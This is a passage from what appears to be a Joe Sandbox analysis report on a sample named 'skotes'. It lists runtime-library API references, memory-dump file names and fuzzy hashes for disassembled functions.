                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00B928DF
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00B92913
                                                                                                                                                                                                                                            • Part of subcall function 00B907ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00B9080D
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00B92993
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00B929DB
                                                                                                                                                                                                                                            • Part of subcall function 00B907C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00B907DE
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00B929EF
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00B92A00
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00B92A4D
                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00B92A7E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1321587334-0
                                                                                                                                                                                                                                          • Opcode ID: 11f5657d158017e03c37dc43706ad0c0683506360f5c5940ab03263680b8178d
                                                                                                                                                                                                                                          • Instruction ID: 82e8ee0b53b426f456a5597fb05e734f245379ff45939358b3c230bbfe6ea0b1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11f5657d158017e03c37dc43706ad0c0683506360f5c5940ab03263680b8178d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07818F32E0161AAFCF28DFA8D8A197DB7F1FB58310B2440BED445A7251EB346D45CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00B96A1F
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00B96A51
                                                                                                                                                                                                                                          • List.LIBCONCRT ref: 00B96A8C
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00B96A9D
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00B96AB9
                                                                                                                                                                                                                                          • List.LIBCONCRT ref: 00B96AF4
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00B96B05
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00B96B20
                                                                                                                                                                                                                                          • List.LIBCONCRT ref: 00B96B5B
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00B96B68
                                                                                                                                                                                                                                            • Part of subcall function 00B95EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00B95EF7
                                                                                                                                                                                                                                            • Part of subcall function 00B95EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00B95F09
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3403738998-0
                                                                                                                                                                                                                                          • Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                          • Instruction ID: 60a2404e818aa28988c4796874e69633e28fdf6500d4a1b0bded4d37bd052aba
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B513E71A00209ABDF18DF64C595FEDB3E8FF08344F1545B9E915AB282DB30AE45CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00BA53A0
                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00BA53C7
                                                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00BA54D3
                                                                                                                                                                                                                                          • IsInExceptionSpec.LIBVCRUNTIME ref: 00BA55AE
                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00BA5650
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                          • API String ID: 4162181273-393685449
                                                                                                                                                                                                                                          • Opcode ID: f9613eec5cd1a147246507692e2badcba5c12646f5bdbe961af5c4a0d59cc39f
                                                                                                                                                                                                                                          • Instruction ID: a149ac5e6f9d20cad3f45cfdc433081e3555f08b76e2d26a7e3a15ac5970e879
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9613eec5cd1a147246507692e2badcba5c12646f5bdbe961af5c4a0d59cc39f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7C16871C08609EFCF25DF94C880AAEBBF9FF66311B14419AF8056B212D771DA51CB91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00B973B0
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00B973F2
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 00B9740E
                                                                                                                                                                                                                                          • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00B97419
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B97440
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
